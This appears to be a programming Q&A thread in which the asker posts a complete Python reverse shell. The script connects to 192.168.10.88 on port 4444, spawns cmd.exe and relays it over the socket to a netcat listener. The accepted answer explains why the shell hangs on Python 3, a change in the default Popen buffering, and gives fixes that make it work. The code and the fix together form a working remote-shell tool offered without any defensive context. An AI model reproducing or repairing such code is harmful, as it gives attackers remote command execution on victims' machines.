# Shell commands get stuck on python 3 but work on python 2

Tags: python, python-2.7, shell, python-3.4, reverse-shell

**The following is my reverse_shell python code**

```
import os,socket,subprocess,threading
def s2p(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)


def p2s(s, p):
    while True:
        s.send(p.stdout.read(1))

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.10.88",4444))

p=subprocess.Popen(['\\windows\system32\\cmd.exe'], stderr=subprocess.STDOUT, stdout=subprocess.PIPE, stdin=subprocess.PIPE)




s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()


try:
    p.wait()
except KeyboardInterrupt:
    s.close()
```

I'm using netcat as a listener.The problem is when I run the above code using python 3.4 shell commands get stuck and I didn't get output but If I use python 2 it works fine.

Comment: Where does it get stuck?

Comment: On netcat window after getting shell the cursor goes to the next line but I did not get any ouput of any command like dir command.This is with python 3 but python 2 works fine and I did get output of all shell commands.

Answer (score 1, accepted):

The default argument for `bufsize` to `Popen` changed between Python 2 and Python 3. In [Python 2](https://docs.python.org/2/library/subprocess.html#popen-constructor) it is `0` meaning unbuffered. In [Python 3](https://docs.python.org/3/library/subprocess.html#popen-constructor) it is `-1` which means use a buffer of size `io.DEFAULT_BUFFER_SIZE`. In Python 3 the program seizes up because the program has written the data to `p.stdin`, but has not yet flushed it -- as the buffer has not filled up. On Windows, `io.DEFAULT_BUFFER_SIZE` is 8,192 and so you would need to write 8kB of data to the socket (from netcat) before you would see any output.

You can switch back to an unbuffered stream or you can manually flush the data after each write. Or you can set the `universal_newlines` argument and use line buffering (`bufsize=1`).

Comment: This really helps and after some modifications I'm getting output now.Thanks